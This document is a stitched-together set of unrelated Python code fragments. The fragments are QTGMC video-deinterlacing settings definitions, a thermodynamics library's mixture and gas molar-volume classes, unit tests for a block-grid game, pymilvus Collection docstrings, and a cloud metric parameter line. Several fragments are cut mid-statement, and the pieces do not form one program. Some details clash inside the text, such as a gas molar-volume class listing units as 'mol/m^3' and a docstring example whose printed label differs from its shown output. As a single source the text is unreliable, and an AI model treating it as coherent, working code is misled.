"""
Resharpening mode. See `SharpnessMode`.
Old "SMode".
"""
lmode: int
"""
Sharpness limiting. See `SharpnessLimitMode`.
Old "SLMode".
"""
lrad: int
"""
Temporal or spatial radius used with sharpness limiting (depends on SLMode).
Temporal radius can only be 0, 1 or 3
Old "SLRad".
"""
ovs: int
"""
Amount of overshoot allowed with temporal sharpness limiting (SLMode = 2,4),
i.e. allow some oversharpening
Old "SOvs".
"""
vthin: float
"""
How much to thin down 1-pixel wide lines that have been widened due to interpolation
into neighboring field lines
Old "SVThin".
"""
bb: int
"""
Back blend (blurred) difference between pre & post sharpened clip (minor fidelity improvement).
See `SharpnessBackBlend`.
Old "Sbb".
"""
class SourceMatchSettings(TypedDict):
match: int
"""
Match mode, see `MatchMode`.
Old "SourceMatch".
"""
lossless: int
"""
Adds some extra detail but:
mode 1 gets shimmer / minor combing,
mode 2 is more stable/tweakable but not exactly lossless.
Old "Lossless".
"""
basic_deint: VSCallableD
"""
Override default interpolation method for basic source-match.
Old "MatchEdi", kinda.
"""
refined_deint: VSCallableD
"""
Override interpolation method for refined source-match.
Can be a good idea to pick MatchEdi2="Bob" for speed.
Old "MatchEdi2", kinda.
"""
refined_tr: int
"""
Temporal radius for refined source-matching.
Basic source-match doesn't need this setting as its temporal radius must match initial_output tr
2=smoothness, 1=speed/sharper, 0=not recommended. Differences are very marginal.
Old "MatchTR2".
"""
enhance: float
"""
Enhance the detail found by source-match modes 2 & 3.
A slight cheat - will enhance noise if set too strong.
Best set < 1.0.
Old "MatchEnhance".
"""
class NoiseSettings(TypedDict):
"""GRAIN"""
mode: int
"""
Bypass mode:
0 = disable,
1 = denoise source & optionally restore some noise back at end of script [use for stronger denoising],
2 = identify noise only & optionally restore some after QTGMC smoothing [for grain retention / light denoising]
Old "NoiseProcess".
"""
denoiser: VSCallableD
"""
Select denoiser to use for noise bypass / denoising.
Old "Denoiser".
"""
use_mc: bool
"""
Whether to provide a motion-compensated clip to the denoiser
for better noise vs detail detection (will be a little slower).
Old "DenoiseMC".
"""
tr: int
"""
Temporal radius used when analyzing clip for noise extraction.
Higher values better identify noise vs detail but are slower.
Old "NoiseTR".
"""
strength: float
"""
Amount of noise known to be in the source, sensible values vary by source and denoiser, so experiment.
Old "Sigma".
"""
chroma: bool
"""
Whether to process chroma noise or not
Old "ChromaNoise"
"""
restore_before_final: float
"""
How much removed noise/grain to restore before final temporal smooth.
Retain "stable" grain and some detail (effect depends on final_output tr).
Old "GrainRestore".
"""
restore_after_final: float
"""
How much removed noise/grain to restore after final temporal smooth.
Retains any kind of noise.
Old "NoiseRestore".
"""
deint: VSCallableD
"""
When noise is taken from interlaced source, how to 'deinterlace' it before restoring.
Old "NoiseDeint".
"""
stabilise: bool
"""
Use motion compensation to limit shimmering and strengthen detail within the restored noise.
Old "StabilizeNoise".
"""
class MotionBlurSettings(TypedDict):
"""
By default QTGMC outputs video at "double-rate", twice the frame rate of the source.
This is because there are two separate images | |
reset the parameters.
'''
methods = [SIMPLE]
if none_and_length_check([self.Tcs, self.Vcs, self.omegas, self.CASs]):
methods.append(COSTALD_MIXTURE)
if all([i in COSTALD_data.index for i in self.CASs]):
self.COSTALD_Vchars = [COSTALD_data.at[CAS, 'Vchar'] for CAS in self.CASs]
self.COSTALD_omegas = [COSTALD_data.at[CAS, 'omega_SRK'] for CAS in self.CASs]
methods.append(COSTALD_MIXTURE_FIT)
if none_and_length_check([self.MWs, self.Tcs, self.Pcs, self.Zcs, self.CASs]):
methods.append(RACKETT)
if all([CAS in COSTALD_data.index for CAS in self.CASs]):
Z_RAs = [COSTALD_data.at[CAS, 'Z_RA'] for CAS in self.CASs]
if not any(np.isnan(Z_RAs)):
self.Z_RAs = Z_RAs
methods.append(RACKETT_PARAMETERS)
if len(self.CASs) > 1 and '7732-18-5' in self.CASs:
wCASs = [i for i in self.CASs if i != '7732-18-5']
if all([i in _Laliberte_Density_ParametersDict for i in wCASs]):
methods.append(LALIBERTE)
self.wCASs = wCASs
self.index_w = self.CASs.index('7732-18-5')
self.all_methods = set(methods)
def calculate(self, T, P, zs, ws, method):
r'''Method to calculate molar volume of a liquid mixture at
temperature `T`, pressure `P`, mole fractions `zs` and weight fractions
`ws` with a given method.
This method has no exception handling; see `mixture_property`
for that.
Parameters
----------
T : float
Temperature at which to calculate the property, [K]
P : float
Pressure at which to calculate the property, [Pa]
zs : list[float]
Mole fractions of all species in the mixture, [-]
ws : list[float]
Weight fractions of all species in the mixture, [-]
method : str
Name of the method to use
Returns
-------
Vm : float
Molar volume of the liquid mixture at the given conditions,
[m^3/mol]
'''
if method == SIMPLE:
Vms = [i(T, P) for i in self.VolumeLiquids]
return Amgat(zs, Vms)
elif method == COSTALD_MIXTURE:
return COSTALD_mixture(zs, T, self.Tcs, self.Vcs, self.omegas)
elif method == COSTALD_MIXTURE_FIT:
return COSTALD_mixture(zs, T, self.Tcs, self.COSTALD_Vchars, self.COSTALD_omegas)
elif method == RACKETT:
return Rackett_mixture(T, zs, self.MWs, self.Tcs, self.Pcs, self.Zcs)
elif method == RACKETT_PARAMETERS:
return Rackett_mixture(T, zs, self.MWs, self.Tcs, self.Pcs, self.Z_RAs)
elif method == LALIBERTE:
ws = list(ws) ; ws.pop(self.index_w)
rho = Laliberte_density(T, ws, self.wCASs)
MW = mixing_simple(zs, self.MWs)
return rho_to_Vm(rho, MW)
else:
raise Exception('Method not valid')
def test_method_validity(self, T, P, zs, ws, method):
r'''Method to test the validity of a specified method for the given
conditions. No methods have implemented checks or strict ranges of
validity.
Parameters
----------
T : float
Temperature at which to check method validity, [K]
P : float
Pressure at which to check method validity, [Pa]
zs : list[float]
Mole fractions of all species in the mixture, [-]
ws : list[float]
Weight fractions of all species in the mixture, [-]
method : str
Method name to use
Returns
-------
validity : bool
Whether or not a specifid method is valid
'''
if LALIBERTE in self.all_methods:
# If everything is an electrolyte, accept only it as a method
if method in self.all_methods:
return method == LALIBERTE
if method in self.all_methods:
return True
else:
raise Exception('Method not valid')
### Gases
def ideal_gas(T, P):
r'''Calculates ideal gas molar volume.
The molar volume of an ideal gas is given by:
.. math::
V = \frac{RT}{P}
Parameters
----------
T : float
Temperature of fluid [K]
P : float
Pressure of fluid [Pa]
Returns
-------
V : float
Gas volume, [m^3/mol]
Examples
--------
>>> ideal_gas(298.15, 101325.)
0.02446539540458919
'''
return R*T/P
#PR = 'PR'
CRC_VIRIAL = 'CRC_VIRIAL'
TSONOPOULOS_EXTENDED = 'TSONOPOULOS_EXTENDED'
TSONOPOULOS = 'TSONOPOULOS'
ABBOTT = 'ABBOTT'
PITZER_CURL = 'PITZER_CURL'
IDEAL = 'IDEAL'
NONE = 'NONE'
volume_gas_methods = [COOLPROP, EOS, CRC_VIRIAL, TSONOPOULOS_EXTENDED, TSONOPOULOS,
ABBOTT, PITZER_CURL, IDEAL]
'''Holds all methods available for the VolumeGas class, for use in
iterating over them.'''
class VolumeGas(TPDependentProperty):
r'''Class for dealing with gas molar volume as a function of
temperature and pressure.
All considered methods are both temperature and pressure dependent. Included
are four CSP methods for calculating second virial coefficients, one
source of polynomials for calculating second virial coefficients, one
equation of state (Peng-Robinson), and the ideal gas law.
Parameters
----------
CASRN : str, optional
The CAS number of the chemical
MW : float, optional
Molecular weight, [g/mol]
Tc : float, optional
Critical temperature, [K]
Pc : float, optional
Critical pressure, [Pa]
omega : float, optional
Acentric factor, [-]
dipole : float, optional
Dipole, [debye]
Notes
-----
A string holding each method's name is assigned to the following variables
in this module, intended as the most convenient way to refer to a method.
To iterate over all methods, use the list stored in
:obj:`volume_gas_methods`.
**PR**:
Peng-Robinson Equation of State. See the appropriate module for more
information.
**CRC_VIRIAL**:
Short polynomials, for 105 fluids from [1]_. The full expression is:
.. math::
B = \sum_1^4 a_i\left[T_0/298.15-1\right]^{i-1}
**TSONOPOULOS_EXTENDED**:
CSP method for second virial coefficients, described in
:obj:`thermo.virial.BVirial_Tsonopoulos_extended`
**TSONOPOULOS**:
CSP method for second virial coefficients, described in
:obj:`thermo.virial.BVirial_Tsonopoulos`
**ABBOTT**:
CSP method for second virial coefficients, described in
:obj:`thermo.virial.BVirial_Abbott`. This method is the simplest CSP
method implemented.
**PITZER_CURL**:
CSP method for second virial coefficients, described in
:obj:`thermo.virial.BVirial_Pitzer_Curl`.
**COOLPROP**:
CoolProp external library; with select fluids from its library.
Range is limited to that of the equations of state it uses, as
described in [2]_. Very slow, but unparalled in accuracy for pressure
dependence.
See Also
--------
:obj:`thermo.virial.BVirial_Pitzer_Curl`
:obj:`thermo.virial.BVirial_Abbott`
:obj:`thermo.virial.BVirial_Tsonopoulos`
:obj:`thermo.virial.BVirial_Tsonopoulos_extended`
References
----------
.. [1] <NAME>., <NAME>, and <NAME>. CRC Handbook of
Chemistry and Physics. [Boca Raton, FL]: CRC press, 2014.
.. [2] Bell, <NAME>., <NAME>, <NAME>, and <NAME>.
"Pure and Pseudo-Pure Fluid Thermophysical Property Evaluation and the
Open-Source Thermophysical Property Library CoolProp." Industrial &
Engineering Chemistry Research 53, no. 6 (February 12, 2014):
2498-2508. doi:10.1021/ie4033999. http://www.coolprop.org/
'''
name = 'Gas molar volume'
units = 'mol/m^3'
interpolation_T = None
'''No interpolation transformation by default.'''
interpolation_P = None
'''No interpolation transformation by default.'''
interpolation_property = None
'''No interpolation transformation by default.'''
interpolation_property_inv = None
'''No interpolation transformation by default.'''
tabular_extrapolation_permitted = True
'''Allow tabular extrapolation by default.'''
property_min = 0
'''Mimimum valid value of gas molar volume. It should normally be well
above this.'''
property_max = 1E10
'''Maximum valid value of gas molar volume. Set roughly at an ideal gas
at 1 Pa and 2 billion K.'''
Pmax = 1E9 # 1 GPa
'''Maximum pressure at which no method can calculate gas molar volume
above.'''
Pmin = 0
'''Minimum pressure at which no method can calculate gas molar volume
under.'''
ranked_methods = []
'''Default rankings of the low-pressure methods.'''
ranked_methods_P = [COOLPROP, EOS, TSONOPOULOS_EXTENDED, TSONOPOULOS, ABBOTT,
PITZER_CURL, CRC_VIRIAL, IDEAL]
'''Default rankings of the pressure-dependent methods.'''
def __init__(self, CASRN='', MW=None, Tc=None, Pc=None, omega=None,
dipole=None, eos=None):
# Only use TPDependentPropoerty functions here
self.CASRN = CASRN
self.MW = MW
self.Tc = Tc
self.Pc = Pc
self.omega = omega
self.dipole = dipole
self.eos = eos
self.Tmin = 0
'''Minimum temperature at which no method can calculate the
gas molar volume under.'''
self.Tmax = 2E9
'''Maximum temperature at which no method can calculate the
gas molar volume above.'''
self.tabular_data = {}
'''tabular_data, dict: Stored (Ts, properties) for any
tabular data; indexed by provided or autogenerated name.'''
self.tabular_data_interpolators = {}
self.tabular_data_interpolators = {}
'''tabular_data_interpolators, dict: Stored (extrapolator,
spline) tuples which are interp1d instances for each set of tabular
data; indexed by tuple of (name, interpolation_T,
interpolation_property, interpolation_property_inv) to ensure that
if an interpolation transform is altered, the old interpolator which
had been created is no longer used.'''
self.tabular_data_P = {}
'''tabular_data_P, dict: Stored (Ts, Ps, properties) for any
tabular data; indexed by provided or autogenerated name.'''
self.tabular_data_interpolators_P = {}
'''tabular_data_interpolators_P, dict: Stored (extrapolator,
spline) tuples which are interp2d instances for each set of tabular
data; indexed by tuple of (name, interpolation_T, interpolation_P,
interpolation_property, interpolation_property_inv) to ensure that
if an interpolation transform is altered, the old interpolator which
had been created is no longer used.'''
self.sorted_valid_methods_P = []
'''sorted_valid_methods_P, list: Stored methods which were found valid
at a specific temperature; set by `TP_dependent_property`.'''
self.user_methods_P = []
'''user_methods_P, list: Stored methods which were specified by the user
in a ranked order of preference; set by `TP_dependent_property`.'''
self.all_methods_P = set()
'''Set of all high-pressure methods available for a given CASRN and
properties; filled by :obj:`load_all_methods`.'''
self.load_all_methods()
def load_all_methods(self):
r'''Method which picks out coefficients for the specified chemical
from the various dictionaries and DataFrames | |
0
board = Block((0, 0), 1000, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
block_squares = _block_to_squares(board)
assert len(block_squares) == 10
assert (COLOUR_LIST[3], (500, 0), 500) in block_squares
assert (COLOUR_LIST[1], (250, 0), 250) in block_squares
assert (COLOUR_LIST[2], (0, 0), 250) in block_squares
assert (COLOUR_LIST[0], (0, 250), 250) in block_squares
assert (COLOUR_LIST[2], (250, 250), 250) in block_squares
assert (COLOUR_LIST[0], (0, 500), 500) in block_squares
assert (COLOUR_LIST[0], (750, 500), 250) in block_squares
assert (COLOUR_LIST[1], (500, 500), 250) in block_squares
assert (COLOUR_LIST[3], (500, 750), 250) in block_squares
assert (COLOUR_LIST[2], (750, 750), 250) in block_squares
# TODO: ~~~~~~ TASK 3 ~~~~~~ ~~~~~~ TASK 3 ~~~~~~ ~~~~~~ TASK 3 ~~~~~~
def test_generate_goals_15() -> None:
goal = generate_goals(2)
colour = COLOUR_LIST.copy()
assert len(goal) == 2
if isinstance(goal[0], PerimeterGoal):
for i in goal:
assert isinstance(i, PerimeterGoal)
assert i.colour in colour
colour.remove(i.colour)
if isinstance(goal[0], BlobGoal):
for ii in goal:
assert isinstance(ii, BlobGoal)
assert ii.colour in colour
colour.remove(ii.colour)
def test_generate_goals_16() -> None:
goal = generate_goals(0)
assert len(goal) == 0
assert goal == []
def test_generate_goals_17() -> None:
goal = generate_goals(4)
colour = COLOUR_LIST.copy()
assert len(goal) == 4
if isinstance(goal[0], PerimeterGoal):
for i in goal:
assert isinstance(i, PerimeterGoal)
assert i.colour in colour
colour.remove(i.colour)
assert len(colour) == 0
if isinstance(goal[0], BlobGoal):
for ii in goal:
assert isinstance(ii, BlobGoal)
assert ii.colour in colour
colour.remove(ii.colour)
assert len(colour) == 0
def test_generate_goals_18() -> None:
goal = generate_goals(3)
colour = COLOUR_LIST.copy()
assert len(goal) == 3
if isinstance(goal[0], PerimeterGoal):
for i in goal:
assert isinstance(i, PerimeterGoal)
assert i.colour in colour
colour.remove(i.colour)
assert len(colour) == 1
if isinstance(goal[0], BlobGoal):
for ii in goal:
assert isinstance(ii, BlobGoal)
assert ii.colour in colour
colour.remove(ii.colour)
assert len(colour) == 1
def test_generate_goals_19() -> None:
goal = generate_goals(1)
colour = COLOUR_LIST.copy()
assert len(goal) == 1
if isinstance(goal[0], PerimeterGoal):
for i in goal:
assert isinstance(i, PerimeterGoal)
assert i.colour in colour
colour.remove(i.colour)
assert len(colour) == 3
if isinstance(goal[0], BlobGoal):
for ii in goal:
assert isinstance(ii, BlobGoal)
assert ii.colour in colour
colour.remove(ii.colour)
assert len(colour) == 3
# TODO: ~~~~~~ TASK 4 ~~~~~~ ~~~~~~ TASK 4 ~~~~~~ ~~~~~~ TASK 4 ~~~~~~
def test_get_block_20() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 3)
# Level 1
colours1 = [None, COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board, colours1)
# Level 2
colours2 = [COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[0]]
set_children(board.children[0], colours2)
# level 3
# testings at level 0
assert _get_block(board, (0, 0), 0) == board
assert _get_block(board, (4, 94), 0) == board
assert _get_block(board, (9343, 32), 0) is None
assert _get_block(board, (750, 32), 0) is None
assert _get_block(board, (750, 0), 0) is None
assert _get_block(board, (750, 750), 0) is None
assert _get_block(board, (0, 750), 0) is None
# testings at level 1
assert _get_block(board, (0, 0), 1) == board.children[1]
assert _get_block(board, (4, 94), 1) == board.children[1]
assert _get_block(board, (321, 94), 1) == board.children[1]
assert _get_block(board, (375, 94), 1) == board.children[0]
assert _get_block(board, (375, 375), 1) == board.children[3]
assert _get_block(board, (750, 750), 1) is None
assert _get_block(board, (400, 750), 1) is None
assert _get_block(board, (400, 300), 1) == board.children[0]
assert _get_block(board, (833, 0), 1) is None
assert _get_block(board, (500, 400), 1) == board.children[3]
# testings at level 2
assert _get_block(board, (0, 0), 2) == board.children[1]
assert _get_block(board, (4, 94), 2) == board.children[1]
# assert _get_block(board, (375, 375), 2) == board.children[3] # TODO: THIS ASSERTION FAILED
assert _get_block(board, (375, 25), 2) == board.children[0].children[1]
assert _get_block(board, (375, 205), 2) == board.children[0].children[2]
assert _get_block(board, (375, 83), 2) == board.children[0].children[1]
assert _get_block(board, (375, 299), 2) == board.children[0].children[2]
assert _get_block(board, (400, 299), 2) == board.children[0].children[2]
assert _get_block(board, (600, 299), 2) == board.children[0].children[3]
assert _get_block(board, (600, 30), 2) == board.children[0].children[0]
assert _get_block(board, (600, 188), 2) == board.children[0].children[3]
assert _get_block(board, (563, 188), 2) == board.children[0].children[3]
assert _get_block(board, (563, 187), 2) == board.children[0].children[0]
assert _get_block(board, (600, 0), 2) == board.children[0].children[0]
assert _get_block(board, (943, 0), 2) is None
# above level 2
assert _get_block(board, (0, 0), 3) == board.children[1]
assert _get_block(board, (0, 0), 4) == board.children[1]
assert _get_block(board, (375, 25), 3) == board.children[0].children[1]
assert _get_block(board, (375, 205), 4) == board.children[0].children[2]
assert _get_block(board, (375, 83), 3) == board.children[0].children[1]
assert _get_block(board, (375, 299), 4) == board.children[0].children[2]
assert _get_block(board, (400, 299), 5) == board.children[0].children[2]
assert _get_block(board, (600, 299), 3) == board.children[0].children[3]
assert _get_block(board, (600, 30), 4) == board.children[0].children[0]
assert _get_block(board, (600, 188), 3) == board.children[0].children[3]
def test_get_block_21() -> None:
# level 0
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 1)
# Level 1
# testings at level 0
assert _get_block(board, (0, 0), 0) == board
assert _get_block(board, (321, 34), 0) == board
assert _get_block(board, (84, 34), 0) == board
assert _get_block(board, (184, 303), 0) == board
assert _get_block(board, (4, 303), 0) == board
assert _get_block(board, (43, 33), 0) == board
assert _get_block(board, (9, 3421), 0) is None
assert _get_block(board, (750, 0), 0) is None
assert _get_block(board, (0, 750), 0) is None
assert _get_block(board, (92, 750), 0) is None
assert _get_block(board, (750, 750), 0) is None
assert _get_block(board, (750, 93), 0) is None
# above level 0
assert _get_block(board, (0, 0), 1) == board
assert _get_block(board, (321, 34), 2) == board
assert _get_block(board, (84, 34), 1) == board
assert _get_block(board, (184, 303), 2) == board
assert _get_block(board, (4, 303), 1) == board
assert _get_block(board, (43, 33), 3) == board
assert _get_block(board, (9, 3421), 5) is None
assert _get_block(board, (750, 0), 1) is None
assert _get_block(board, (0, 750), 2) is None
assert _get_block(board, (92, 750), 1) is None
assert _get_block(board, (750, 750), 1) is None
assert _get_block(board, (750, 93), 1) is None
def test_get_block_22() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
# testing at level 0
assert _get_block(board, (1, 2), 0) == board
assert _get_block(board, (10, 22), 0) == board
assert _get_block(board, (10, 22), 0) == board
assert _get_block(board, (150, 22), 0) == board
assert _get_block(board, (250, 22), 0) == board
assert _get_block(board, (250, 220), 0) == board
assert _get_block(board, (163, 220), 0) == board
assert _get_block(board, (278, 89), 0) == board
assert _get_block(board, (500, 300), 0) == board
assert _get_block(board, (600, 300), 0) == board
assert _get_block(board, (520, 699), 0) == board
assert _get_block(board, (600, 700), 0) == board
assert _get_block(board, (500, 700), 0) == board
assert _get_block(board, (278, 300), 0) == board
# testing at level 1
assert _get_block(board, (500, 30), 1) == board.children[0]
assert _get_block(board, (10, 22), 1) == board.children[1]
assert _get_block(board, (10, 22), 1) == board.children[1]
assert _get_block(board, (150, 22), 1) == board.children[1]
assert _get_block(board, (250, 22), 1) == board.children[1]
assert _get_block(board, (500, 300), 1) == board.children[0]
assert _get_block(board, (600, 375), 1) == board.children[3]
assert _get_block(board, (520, 699), 1) == board.children[3]
assert _get_block(board, (600, 700), 1) == board.children[3]
assert _get_block(board, (500, 700), 1) == board.children[3]
# testing at level 2
assert _get_block(board, (1, 2), 2) == board.children[1].children[1]
assert _get_block(board, (10, 22), 2) == board.children[1].children[1]
assert _get_block(board, (10, 22), 2) == board.children[1].children[1]
assert _get_block(board, (150, 22), 2) == board.children[1].children[1]
assert _get_block(board, (250, 22), 2) == board.children[1].children[0]
assert _get_block(board, (250, 220), 2) == board.children[1].children[3]
assert _get_block(board, (163, 220), 2) == board.children[1].children[2]
assert _get_block(board, (278, 89), 2) == board.children[1].children[0]
assert _get_block(board, (278, 300), 2) == board.children[1].children[3]
assert _get_block(board, (500, 300), 2) == board.children[0]
assert _get_block(board, (600, 300), 2) == board.children[0]
assert _get_block(board, (520, 699), 2) == board.children[3].children[2]
assert _get_block(board, (499, 699), 2) == board.children[3].children[2]
assert _get_block(board, (60, 700), 2) == board.children[2]
assert _get_block(board, (600, 700), 2) == board.children[3].children[3]
assert _get_block(board, (10, 700), 2) == board.children[2]
assert _get_block(board, (500, 700), 2) == board.children[3].children[2]
assert _get_block(board, (563, 7), 2) == board.children[0]
# TODO: ~~~~~~ TASK 5 ~~~~~~ ~~~~~~ TASK 5 ~~~~~~ ~~~~~~ TASK 5 ~~~~~~
def test_update_child_pos_23() -> None:
# Level 0
board = Block((0, 0), | |
* *_async* (``bool``) --
Indicate if invoke asynchronously.
:raises CollectionNotExistException: If the collection does not exist.
:raises ParamError: If the parameters are invalid.
:raises BaseException: If the specified field, index or partition does not exist.
:example:
>>> from pymilvus import connections, Collection, FieldSchema, CollectionSchema, DataType
>>> connections.connect()
>>> schema = CollectionSchema([
... FieldSchema("film_id", DataType.INT64, is_primary=True),
... FieldSchema("films", dtype=DataType.FLOAT_VECTOR, dim=2)
... ])
>>> collection = Collection("test_collection_load", schema)
>>> collection.insert([[1, 2], [[1.0, 2.0], [3.0, 4.0]]])
<pymilvus.search.MutationResult object at 0x7fabaf3e5d50>
>>> collection.load()
>>> collection.num_entities
2
"""
conn = self._get_connection()
if partition_names is not None:
conn.load_partitions(self._name, partition_names, timeout=timeout, **kwargs)
else:
conn.load_collection(self._name, timeout=timeout, **kwargs)
def release(self, timeout=None, **kwargs):
"""
Releases the collection from memory.
:param timeout:
* *timeout* (``float``) --
An optional duration of time in seconds to allow for the RPC. If timeout
is set to None, the client keeps waiting until the server responds or an error occurs.
:raises CollectionNotExistException: If collection does not exist.
:raises BaseException: If collection has not been loaded to memory.
:example:
>>> from pymilvus import connections, Collection, FieldSchema, CollectionSchema, DataType
>>> connections.connect()
>>> schema = CollectionSchema([
... FieldSchema("film_id", DataType.INT64, is_primary=True),
... FieldSchema("films", dtype=DataType.FLOAT_VECTOR, dim=2)
... ])
>>> collection = Collection("test_collection_release", schema)
>>> collection.insert([[1, 2], [[1.0, 2.0], [3.0, 4.0]]])
<pymilvus.search.MutationResult object at 0x7fabaf3e5d50>
>>> collection.load()
>>> collection.num_entities
2
>>> collection.release() # release the collection from memory
"""
conn = self._get_connection()
conn.release_collection(self._name, timeout=timeout, **kwargs)
def insert(self, data, partition_name=None, timeout=None, **kwargs):
"""
Insert data into the collection.
:param data: The specified data to insert, the dimension of data needs to align with column
number
:type data: list-like(list, tuple) object or pandas.DataFrame
:param partition_name: The partition name which the data will be inserted to, if partition
name is not passed, then the data will be inserted to "_default"
partition
:type partition_name: str
:param timeout:
* *timeout* (``float``) --
An optional duration of time in seconds to allow for the RPC. If timeout
is set to None, the client keeps waiting until the server responds or an error occurs.
:raises CollectionNotExistException: If the specified collection does not exist.
:raises ParamError: If input parameters are invalid.
:raises BaseException: If the specified partition does not exist.
:example:
>>> from pymilvus import connections, Collection, FieldSchema, CollectionSchema, DataType
>>> import random
>>> connections.connect()
<pymilvus.client.stub.Milvus object at 0x7f8579002dc0>
>>> schema = CollectionSchema([
... FieldSchema("film_id", DataType.INT64, is_primary=True),
... FieldSchema("films", dtype=DataType.FLOAT_VECTOR, dim=2)
... ])
>>> collection = Collection("test_collection_insert", schema)
>>> data = [
... [random.randint(1, 100) for _ in range(10)],
... [[random.random() for _ in range(2)] for _ in range(10)],
... ]
>>> collection.insert(data)
>>> collection.num_entities
10
"""
if data is None:
return MutationResult(data)
if not self._check_insert_data_schema(data):
raise SchemaNotReadyException(0, ExceptionsMessage.TypeOfDataAndSchemaInconsistent)
conn = self._get_connection()
entities = Prepare.prepare_insert_data(data, self._schema)
res = conn.insert(collection_name=self._name, entities=entities, ids=None,
partition_name=partition_name, timeout=timeout, **kwargs)
if kwargs.get("_async", False):
return MutationFuture(res)
return MutationResult(res)
def delete(self, expr, partition_name=None, timeout=None, **kwargs):
"""
Delete entities with an expression condition.
And return results to show which primary key is deleted successfully
:param expr: The expression to specify entities to be deleted
:type expr: str
:param partition_name: Name of partitions that contain entities
:type partition_name: str
:param timeout: An optional duration of time in seconds to allow for the RPC. When timeout
is set to None, client waits until server response or error occur
:type timeout: float
:return: list of ids of the deleted vectors.
:rtype: list
:raises:
RpcError: If gRPC encounter an error
ParamError: If parameters are invalid
BaseException: If the return result from server is not ok
:example:
>>> from pymilvus import connections, Collection, FieldSchema, CollectionSchema, DataType
>>> import random
>>> connections.connect()
>>> schema = CollectionSchema([
... FieldSchema("film_id", DataType.INT64, is_primary=True),
... FieldSchema("film_date", DataType.INT64),
... FieldSchema("films", dtype=DataType.FLOAT_VECTOR, dim=2)
... ])
>>> collection = Collection("test_collection_query", schema)
>>> # insert
>>> data = [
... [i for i in range(10)],
... [i + 2000 for i in range(10)],
... [[random.random() for _ in range(2)] for _ in range(10)],
... ]
>>> collection.insert(data)
>>> collection.num_entities
>>> expr = "film_id in [ 0, 1 ]"
>>> res = collection.delete(expr)
>>> assert len(res) == 2
>>> print(f"- Deleted entities: {res}")
- Delete results: [0, 1]
"""
conn = self._get_connection()
res = conn.delete(collection_name=self._name, expr=expr,
partition_name=partition_name, timeout=timeout, **kwargs)
if kwargs.get("_async", False):
return MutationFuture(res)
return MutationResult(res)
def search(self, data, anns_field, param, limit, expr=None, partition_names=None,
output_fields=None, timeout=None, round_decimal=-1, **kwargs):
"""
Conducts a vector similarity search with an optional boolean expression as filter.
:param data: The vectors of search data, the length of data is number of query (nq), the
dim of every vector in data must be equal to vector field's of collection.
:type data: list[list[float]]
:param anns_field: The vector field used to search of collection.
:type anns_field: str
:param param: The parameters of search, such as ``nprobe``.
:type param: dict
:param limit: The max number of returned record, also known as ``topk``.
:type limit: int
:param expr: The boolean expression used to filter attribute.
:type expr: str
:param partition_names: The names of partitions to search.
:type partition_names: list[str]
:param output_fields: The fields to return in the search result, not supported now.
:type output_fields: list[str]
:param timeout: An optional duration of time in seconds to allow for the RPC. When timeout
is set to None, client waits until server response or error occur.
:type timeout: float
:param round_decimal: The specified number of decimal places of returned distance
:type round_decimal: int
:param kwargs:
* *_async* (``bool``) --
Indicate if invoke asynchronously. When value is true, method returns a
SearchFuture object; otherwise, method returns results from server directly.
* *_callback* (``function``) --
The callback function which is invoked after server response successfully.
It functions only if _async is set to True.
* *guarantee_timestamp* (``int``) --
This function instructs Milvus to see all operations performed before a provided timestamp. If no
such timestamp is provided, then Milvus will search all operations performed to date.
* *travel_timestamp* (``int``) --
Users can specify a timestamp in a search to get results based on a data view
at a specified point in time.
:return: SearchResult:
SearchResult is iterable and is a 2d-array-like class, the first dimension is
the number of vectors to query (nq), the second dimension is the number of limit(topk).
:rtype: SearchResult
:raises RpcError: If gRPC encounter an error.
:raises ParamError: If parameters are invalid.
:raises DataTypeNotMatchException: If wrong type of param is passed.
:raises BaseException: If the return result from server is not ok.
:example:
>>> from pymilvus import connections, Collection, FieldSchema, CollectionSchema, DataType
>>> import random
>>> connections.connect()
<pymilvus.client.stub.Milvus object at 0x7f8579002dc0>
>>> schema = CollectionSchema([
... FieldSchema("film_id", DataType.INT64, is_primary=True),
... FieldSchema("films", dtype=DataType.FLOAT_VECTOR, dim=2)
... ])
>>> collection = Collection("test_collection_search", schema)
>>> # insert
>>> data = [
... [i for i in range(10)],
... [[random.random() for _ in range(2)] for _ in range(10)],
... ]
>>> collection.insert(data)
>>> collection.num_entities
10
>>> collection.load()
>>> # search
>>> search_param = {
... "data": [[1.0, 1.0]],
... "anns_field": "films",
... "param": {"metric_type": "L2"},
... "limit": 2,
... "expr": "film_id > 0",
... }
>>> res = collection.search(**search_param)
>>> assert len(res) == 1
>>> hits = res[0]
>>> assert len(hits) == 2
>>> print(f"- Total hits: {len(hits)}, hits ids: {hits.ids} ")
- Total hits: 2, hits ids: [8, 5]
>>> print(f"- Top1 hit id: {hits[0].id}, distance: {hits[0].distance}, score: {hits[0].score} ")
- Top1 hit id: 8, distance: 0.10143111646175385, score: 0.10143111646175385
"""
if expr is not None and not isinstance(expr, str):
raise DataTypeNotMatchException(0, ExceptionsMessage.ExprType % type(expr))
conn = self._get_connection()
res = conn.search(self._name, data, anns_field, param, limit, expr,
partition_names, output_fields, timeout, round_decimal, **kwargs)
if kwargs.get("_async", False):
return SearchFuture(res)
return SearchResult(res)
def query(self, expr, output_fields=None, partition_names=None, timeout=None):
"""
Query with a set of criteria, and results in a list of records that match the query exactly.
:param expr: The query expression
:type expr: str
:param output_fields: A list of fields to return
:type output_fields: list[str]
:param partition_names: Name of partitions that contain entities
| |
when added to a Graph in a Dashboard. Default: - No label
:param period: The period over which the specified statistic is applied. Default: Duration.minutes(5)
